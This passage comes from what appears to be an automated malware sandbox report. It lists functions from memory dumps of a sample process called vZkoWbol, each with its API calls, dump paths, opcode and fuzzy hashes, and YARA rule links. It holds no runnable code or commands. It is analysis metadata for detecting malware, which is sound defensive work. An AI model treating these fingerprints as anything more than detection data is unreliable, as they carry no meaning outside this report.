                                                                    • Opcode ID: 084797330788fd91e790fe720340614ba76c3c0234d95da958c2259fcd6d952c
                                                                    • Instruction ID: 9a814c15847491ca602d83e3a02b2f9280ae54559d4e3619db385f56b55bbcc2
                                                                    • Opcode Fuzzy Hash: 084797330788fd91e790fe720340614ba76c3c0234d95da958c2259fcd6d952c
                                                                    • Instruction Fuzzy Hash: E71103B18002498FDB50EF9AD448BEEBBF8EB48324F20845AD559A7250D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D474B8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06D47495), ref: 06D4751F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 5affffc7d82bf310e0cc1fdc4ed5f16a441035bc76f70af103313b279213d3ad
                                                                    • Instruction ID: 12ccc92923b2da616e7df450d3a95ddf6a97d8428564cb663af79ec67acc8182
                                                                    • Opcode Fuzzy Hash: 5affffc7d82bf310e0cc1fdc4ed5f16a441035bc76f70af103313b279213d3ad
                                                                    • Instruction Fuzzy Hash: 0C1103B58002498FDB20DF9AD844BDEBBF4EB48310F20845AD519A7350D379A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D47D81 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06D47DDD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: 7521797c5a8e756f6fe281d11a3ba36a965e4c08dffc35627285a0c9a8d07a56
                                                                    • Instruction ID: eba1bfec3ca2b421867cb9f38f71b6cd19d5cb64ce0bc93cfed2cbc72c7804ae
                                                                    • Opcode Fuzzy Hash: 7521797c5a8e756f6fe281d11a3ba36a965e4c08dffc35627285a0c9a8d07a56
                                                                    • Instruction Fuzzy Hash: D01115B19002498FDB20DF9AD448BDEBFF4EB48314F20845AE558A3240D378AA44CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5DA9D Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: 325a8ac5682d8ac6ba1c9ca5a40ae44d6ad07199699f6638c5d6ec046787429c
                                                                    • Instruction ID: 9d1d32b03a20701153c23db9aa359a5c12bc6855685ee40393a596c2c2267abc
                                                                    • Opcode Fuzzy Hash: 325a8ac5682d8ac6ba1c9ca5a40ae44d6ad07199699f6638c5d6ec046787429c
                                                                    • Instruction Fuzzy Hash: 9A418F30E0030A9FDF54DF65D4506AEBBB7EF85300F214429E805EB644EB75D946CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D521C8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: PH]q
                                                                    • API String ID: 0-3168235125
                                                                    • Opcode ID: bfa68a07af9dbbbd53b028f225abbf8e9bd9c533bc186188e7877f11d1033db9
                                                                    • Instruction ID: fc6d54616a29182dbc8913bbc4cea66399b5e523e9520841ce2cedaa8afc34d1
                                                                    • Opcode Fuzzy Hash: bfa68a07af9dbbbd53b028f225abbf8e9bd9c533bc186188e7877f11d1033db9
                                                                    • Instruction Fuzzy Hash: F231DE30B002018FDF689B74D56066E7BE6AFC9714F218438D806DB384DE39DD4ACB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D582D6 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q
                                                                    • API String ID: 0-1007455737
                                                                    • Opcode ID: a4986b0f2f832c7402ae2c3d915b537f34edc2306285b6554a8c4ed7390d430f
                                                                    • Instruction ID: e51c438c2a96f0be56994a172d09bf8c7b4f8cf8e6dfe03707d581c3b6727aa9
                                                                    • Opcode Fuzzy Hash: a4986b0f2f832c7402ae2c3d915b537f34edc2306285b6554a8c4ed7390d430f
                                                                    • Instruction Fuzzy Hash: BFF0ED36B04229CFFFA44F86E8801ACB3B4EB802A2F170062CD02D7950DA34CE46EB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D561C0 Relevance: .2, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec6c62a61f0e9920c7944a062658f8649c7f3801713e269492d6951515e871cb
                                                                    • Instruction ID: 6938688520bc495fd680d486106f840f22b8619305601e3a54be51b0b9f477b4
                                                                    • Opcode Fuzzy Hash: ec6c62a61f0e9920c7944a062658f8649c7f3801713e269492d6951515e871cb
                                                                    • Instruction Fuzzy Hash: E661AF71F000114FDF649B7AC88066FBADBAFD4224B554479D80EDB360DE69DD0287D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D542B1 Relevance: .2, Instructions: 227COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0fb31295e61fe28fe178141dc919899eb16ab19838c8428b3e6bc8f74188cbee
                                                                    • Instruction ID: bcaf919d168e3087799eb4e8499cf42b5c6dbe767baca740fae2255982bc05f3
                                                                    • Opcode Fuzzy Hash: 0fb31295e61fe28fe178141dc919899eb16ab19838c8428b3e6bc8f74188cbee
                                                                    • Instruction Fuzzy Hash: 28813D30B0020A9BDF44DFA9D4546AEB7F2EF89304F118428D80ADB794DB74DC868B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D545CC Relevance: .2, Instructions: 222COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49366cf537378c2d4ffe7cc2f4d89ef6d8693bc9daac714c88fe1a217b4623ca
                                                                    • Instruction ID: 0365c352fee84c6a9c1c887659b1e44bbebcfce754ffae0a4aa1b93ec1e9483e
                                                                    • Opcode Fuzzy Hash: 49366cf537378c2d4ffe7cc2f4d89ef6d8693bc9daac714c88fe1a217b4623ca
                                                                    • Instruction Fuzzy Hash: B1914E30E0021A8BDF64DF68C890BDDB7B1FF89304F208599D54DAB255DB74AA86CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5AF08 Relevance: .2, Instructions: 215COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a02ba20e4ccd67a90bb1dac8c49c694972a5cea47c271a2b0a44e6399809995c
                                                                    • Instruction ID: 74af2480d4cff4865d823c4fee132ecb0e52c705d5e3cc76edf04057c486d450
                                                                    • Opcode Fuzzy Hash: a02ba20e4ccd67a90bb1dac8c49c694972a5cea47c271a2b0a44e6399809995c
                                                                    • Instruction Fuzzy Hash: 58715F30E1031A8FCF54DFA9D4906AEB7B6FF85304F11862AE809AB754DB74D846CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D545E0 Relevance: .2, Instructions: 210COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c25b363a260ab576ef9227dc67e9f06904d9e26bf99854a5fcbc85871da43b5
                                                                    • Instruction ID: b8a5b5a852989df5fa88571f431ead6060c3611b0f093be39afaf1ab0ff4231a
                                                                    • Opcode Fuzzy Hash: 6c25b363a260ab576ef9227dc67e9f06904d9e26bf99854a5fcbc85871da43b5
                                                                    • Instruction Fuzzy Hash: 5E913D30E1021A8BDF64DF68C890BDDB7B1FF89304F208699D54DAB254DB70AA85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5EAE8 Relevance: .2, Instructions: 206COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: aec1391c1353ef6f4493cfe80b3aafb4d98b925a9d49d2951d962bb5fe6145dd
                                                                    • Instruction ID: 2928ff792f23019f2864af024beb7b36e9ba4f9de10c5ddb107383e16b6deca8
                                                                    • Opcode Fuzzy Hash: aec1391c1353ef6f4493cfe80b3aafb4d98b925a9d49d2951d962bb5fe6145dd
                                                                    • Instruction Fuzzy Hash: 0F714C30A002099FDB54EFA9D980AADBBF6FF84304F25852AD415EB764DB34ED46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5EAF8 Relevance: .2, Instructions: 201COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b8467be28e4665f127681bf1b049c796dee79ba1283c2b99a9e282ced7586d5b
                                                                    • Instruction ID: a1b007e65c7abb3766241af7dc6ccbd630b46082dbca6a7822364ba40473843e
                                                                    • Opcode Fuzzy Hash: b8467be28e4665f127681bf1b049c796dee79ba1283c2b99a9e282ced7586d5b
                                                                    • Instruction Fuzzy Hash: F8713E30A002099FDB54EFA9D980A9DBBF6FF84304F258429D415EB764DB34ED46CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5FB87 Relevance: .2, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 15855dfa3d450321f17efbd34509925256663a3f32eb2ebc63e3687069bb3229
                                                                    • Instruction ID: bcf6d8278a31c7b3126041e6826cdf31f85eb20aa9584558fbda57752708e9ab
                                                                    • Opcode Fuzzy Hash: 15855dfa3d450321f17efbd34509925256663a3f32eb2ebc63e3687069bb3229
                                                                    • Instruction Fuzzy Hash: 34510531E00209DFCF54ABB8E4986ADB7B2FB84315F11487AE906DF650DB358845CF81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5F939 Relevance: .2, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 48fde09a76c315060c7bc2b5fccd72f963c128f4f27629e1600be3215cb5b734
                                                                    • Instruction ID: d010de5ee8786515133f57d6e6b7865bfc4d3b40741e1e109f470477e8e646c7
                                                                    • Opcode Fuzzy Hash: 48fde09a76c315060c7bc2b5fccd72f963c128f4f27629e1600be3215cb5b734
                                                                    • Instruction Fuzzy Hash: C451C7B0B102049FEF605B7DE954B6F265FEB89710F11483AE80EDB795C92CCC558BA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5F948 Relevance: .2, Instructions: 163COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f8b1e45885483bc82892601832ec8e749458e615b786777d4c591b20062b8a38
                                                                    • Instruction ID: 3a3250ac235c26a33b3283aad3fd752074980ab6bf08766ba6d1da0fc6502d15
                                                                    • Opcode Fuzzy Hash: f8b1e45885483bc82892601832ec8e749458e615b786777d4c591b20062b8a38
                                                                    • Instruction Fuzzy Hash: 3D51D8B0B10204DBEF645B7DE954B2F265FEB89710F21483AD80EDB795C92CCC458B92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D55421 Relevance: .1, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08baf74f88391d91b227a706e3727b4a8942424f101d026e8fa50ea4d18f7c6b
                                                                    • Instruction ID: 7c3f1708c6fea3eb52d90d03aaa4f0d5a90ee65bac7b9232cb04695816536df2
                                                                    • Opcode Fuzzy Hash: 08baf74f88391d91b227a706e3727b4a8942424f101d026e8fa50ea4d18f7c6b
                                                                    • Instruction Fuzzy Hash: 2E417171E006098FCF71CFA9E8C0ABFB7B2EB48310F11492AD51AD7A50D731E9558B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D52078 Relevance: .1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d166c46551adf11b83b311c9bb41aa88b6527b4c62a314da7cea6a1ad8674830
                                                                    • Instruction ID: 88de3a616c2f811cefa510d51c9c972f51d2a316bb38b6cf755907fb64e92aaa
                                                                    • Opcode Fuzzy Hash: d166c46551adf11b83b311c9bb41aa88b6527b4c62a314da7cea6a1ad8674830
                                                                    • Instruction Fuzzy Hash: 5C316130E0020A9FCF59CF65D894A9EB7B2EF89310F118529E906E7750DB75AD46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D52088 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52dbdafe8a86b6c3a258a82aad04c17d1fd231e822b8b41e955fac96fadb48c5
                                                                    • Instruction ID: 98fb5c28b0d3e2db2d47ee3291da6440d25f62abb6fd47a06aeb882c9a7e2eb9
                                                                    • Opcode Fuzzy Hash: 52dbdafe8a86b6c3a258a82aad04c17d1fd231e822b8b41e955fac96fadb48c5
                                                                    • Instruction Fuzzy Hash: 2F318030E0020A9FCF59CF65D854A9EB7B2EF89310F11C529E906E7750DB75AD46CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D53AB1 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3ca4a5b9b140e667ee6cd44cc8e9968715f0e1f6d7ea3f7a782cb442a1f95d39
                                                                    • Instruction ID: 1260c4fcd65491a8262a817d019c09dcfb654d5c37a05617c05618e57b9ff4c2
                                                                    • Opcode Fuzzy Hash: 3ca4a5b9b140e667ee6cd44cc8e9968715f0e1f6d7ea3f7a782cb442a1f95d39
                                                                    • Instruction Fuzzy Hash: 99219C75F002059FDF00DFA9D880AAEBBF2EB88790F028025E909E7350EB35DD418B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D53AC0 Relevance: .1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed6d212077df94f75e54917095b9840c0e2c0612f889f201d800a3e98b87ddbb
                                                                    • Instruction ID: 18f44d012cd8850ff05177647cea1c9798265142dcf65ef6734737a6c981d2a6
                                                                    • Opcode Fuzzy Hash: ed6d212077df94f75e54917095b9840c0e2c0612f889f201d800a3e98b87ddbb
                                                                    • Instruction Fuzzy Hash: 91219C75F006059FDF50DFA9D880AAEB7F1EB48650F128025E909E7340EB35DD418B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0134D3BC Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7adb7aac96cfdce39a44ea0808629c3c473f796888a97cf772dcc325f4a13526
                                                                    • Instruction ID: f80ba3ee7ab2418ae43f9493103f89db928cb5c5213539d6efd5826a44412401
                                                                    • Opcode Fuzzy Hash: 7adb7aac96cfdce39a44ea0808629c3c473f796888a97cf772dcc325f4a13526
                                                                    • Instruction Fuzzy Hash: 71213471604204DFCB05CFA8D5C0B26BFA9FB94318F20C56DE90A1B396C77AF406CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0134D044 Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9858c9a5f399f80cf33d95b3a1154e417385b7234f67d08d141ee9f35d7d2111
                                                                    • Instruction ID: 4c11443ca256e252d78213615befcd74b51d5947fe3235127446bc26b8f7214c
                                                                    • Opcode Fuzzy Hash: 9858c9a5f399f80cf33d95b3a1154e417385b7234f67d08d141ee9f35d7d2111
                                                                    • Instruction Fuzzy Hash: 92213771504204DFCB15CF68C9C4B26BBE5FB98318F20C56DE9490B352C77AE446CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0134D20C Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524608361.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_134d000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 353c549473ae65836fb0ae98868b0d4409ab9fcce22639138123747724352b96
                                                                    • Instruction ID: 6193810e5af75149837ae217049568df4f3719560031830c0f0e244dcf3979f8
                                                                    • Opcode Fuzzy Hash: 353c549473ae65836fb0ae98868b0d4409ab9fcce22639138123747724352b96
                                                                    • Instruction Fuzzy Hash: 71212671504248DFDB01DF98D5C4B26BBE9FB94338F20C669E9490B746C37AE406CA61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D54210 Relevance: .1, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1071d54c172bd9616be30f2c62a5e9421403e6b831fa91f08c8bf3ea89eb21ed
                                                                    • Instruction ID: 6e23af4c78b40692ec82797da41e71292c5bc0210126a0b2b5fa464b612826ff
                                                                    • Opcode Fuzzy Hash: 1071d54c172bd9616be30f2c62a5e9421403e6b831fa91f08c8bf3ea89eb21ed
                                                                    • Instruction Fuzzy Hash: 2E014530B001205FDF6286BED81476BBBDADBCA325F118439E50EC7750E959DC420392
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D53BD0 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8530d5dc44e8e1be7c1e503189a7a26ed8f569f7448dad9f21c6fee919fca4b9
                                                                    • Instruction ID: 2c1acfef55f7774f1fb21d3ceacc274c4b6329625a6c977f1862cbc69ffaa4c0
                                                                    • Opcode Fuzzy Hash: 8530d5dc44e8e1be7c1e503189a7a26ed8f569f7448dad9f21c6fee919fca4b9
                                                                    • Instruction Fuzzy Hash: 8C11A136B101254BDF449A68C8546AEB3ABEBC8650B028139C80AE7344EE29DC028BD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5ED69 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01fc67ea64cdda8401848353eccbe18daa48fdc913b9f390937798e1c424cb65
                                                                    • Instruction ID: 373b6fd17b4114a504de05a2aafb503adcbfd4c33b36e6b5eb550e5e1bb240ec
                                                                    • Opcode Fuzzy Hash: 01fc67ea64cdda8401848353eccbe18daa48fdc913b9f390937798e1c424cb65
                                                                    • Instruction Fuzzy Hash: BD01FC31B041101BDF65963E9854B6F7BDADBC6624F15443AF90EC7751DE18DE0243D2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D53888 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 116d9ac7cc27f890e48c6131a4047b95a666b08a81ab02e04eadfce87e39efdb
                                                                    • Instruction ID: b4ec300abb20465b44e330c25b0f985a48d4153673f963acd76bb68471546a04
                                                                    • Opcode Fuzzy Hash: 116d9ac7cc27f890e48c6131a4047b95a666b08a81ab02e04eadfce87e39efdb
                                                                    • Instruction Fuzzy Hash: AE21E0B5D01259ABCB00DF9AD885ADEFFB8FB49310F10812AE918A7640D374A554CFE5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5A2E7 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d253f8e41fe7e06b7032a1737579711d1e7714c9b83b0ffd7292c4caf583fec9
                                                                    • Instruction ID: e734428d9fe1a3662130afb8cb9fe63ea822100e42a807ee2c4d114c7bc6e034
                                                                    • Opcode Fuzzy Hash: d253f8e41fe7e06b7032a1737579711d1e7714c9b83b0ffd7292c4caf583fec9
                                                                    • Instruction Fuzzy Hash: A7012430B101210FEF65EBBDE85072E7BD6EFCA645F124529E50ACB3A1EE19DD028381
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0134D3B7 Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
